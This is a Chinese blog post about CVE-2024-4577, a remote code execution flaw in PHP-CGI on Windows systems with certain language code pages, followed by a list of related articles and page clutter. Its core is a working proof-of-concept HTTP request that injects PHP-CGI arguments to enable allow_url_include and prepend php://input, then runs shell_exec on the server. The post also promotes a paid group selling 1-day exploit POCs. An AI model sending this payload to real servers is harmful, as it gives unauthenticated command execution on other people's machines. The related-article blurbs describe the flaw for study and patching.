PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577) 有POC!!!!!

已于 2024-06-07 16:24:48 修改
阅读量3.8k 收藏 3
点赞数 16
文章标签: php 开发语言
于 2024-06-07 14:44:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WuYSec/article/details/139526486
版权

0x01 漏洞描述

PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。

0x02 漏洞POC

POST /index.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

<?php echo shell_exec("dir"); ?>

0x03 知识星球

无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等

WuY1nSec
关注
CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
薛定谔嘚喵博客
06-11 397
PHP语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 3167
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全。
PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577)复现
huangyongkang666的博客
06-13 1181
PHP(Hypertext Preprocessor,超文本预处理器)是一种广泛使用的开源脚本语言,主要用于Web开发,用于生成动态网页内容。PHP的语法借鉴了C、Java、Perl等语言的特点,易于学习,并且可以快速执行漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的,导致未经身份认证的远程攻击者可以通过特定的字符序列绕过此前CVE-2012-1823的防护,通过参数注入攻击在远程PHP服务器上执行任意代码,从而导致远程代码执行
XAMPP默认环境CVE-2024-4577 PHP CGI 远程代码执行漏洞复现
最新发布
m0_74321564的博客
08-25 1246
XAMPP默认环境CVE-2024-4577 PHP CGI 远程代码执行漏洞复现,CVE-2024-4577是一个影响在Windows平台上运行的PHP CGI远程代码执行漏洞漏洞的存在是因为PHP在设计时未能预见到Windows的Best-Fit字符编码转换特性,这使得攻击者可以通过构造特定的请求来绕过安全限制。受影响的环境包括使用特定语系设置的Windows系统,如简体中文(936)、繁体中文(950)和日文(932)
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 2185
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
CVE-2024-4577PHP CGI 远程代码执行漏洞
qq_21039641的博客
06-08 2050
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 914
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现】CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1590
漏洞复现】CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1412
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1944
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
网络安全从业者的学习笔记
06-10 1691
导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的。由于Windows系统内字符编码转换的Best-Fit特性导致PHP原本的安全限制被绕过,再加上一些特殊的PHP CGI环境配置导致了这个问题。目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。无需任何配置信息修改。
漏洞分析 | PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577
WangsuSecurity的博客
07-05 1158
目前该漏洞的细节已公开,鉴于该漏洞易于利用,且可远程执行命令,建议所有受影响的企业尽快升级修复。
PHP-CGI远程代码执行漏洞
weixin_69925635的博客
07-18 685
使用kali-msf6对ubuntu的php-CGI漏洞攻击
php cgi-wrap远程代码执行漏洞
liu510817387的专栏
05-04 1455
国外安全组织研究称如果以cgi-wrap的方式的方式去调用php,就可能导致远程代码执行漏洞导致服务器沦陷,乌云已经证明并且确认该问题存在,国内较主要虚拟主机提供商已经证明受此问题影响,可导致网站沦陷,在补丁正式发布之前注意服务器防护和监控。
漏洞复现-PHP-CGI Windows平台远程代码执行漏洞CVE-2024-4577
玄道的网安博客
08-12 1025
语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
fly夏天的博客
06-14 1258
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577)分析与复现
课嗨教育的专栏
06-24 209
说白了其实就是windows对于不同编码字符集之间转化的一个特性,可能大家对于Best-Fit很陌生,如果换一个词叫做宽字节,我想大家就会很熟悉了,说白了就是。
PHP-CGI远程代码执行漏洞CVE-2012-1823)
千寻的博客
03-06 1267
就是用户请求的`querystring`(`querystring`字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了`php-cgi`的参数,最终导致了一系列结果。
Windows SMBv3远程代码执行漏洞CVE-2020-0796:漏洞分析与修复策略
Windows SMBv3 远程代码执行漏洞CVE-2020-0796)是一起严重的安全问题,影响了Windows 10 Version 1903、1909以及Windows Server 1903、1909的多个版本。此漏洞属于SMB缓冲区溢出类型,允许未经授权的远程攻击者...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值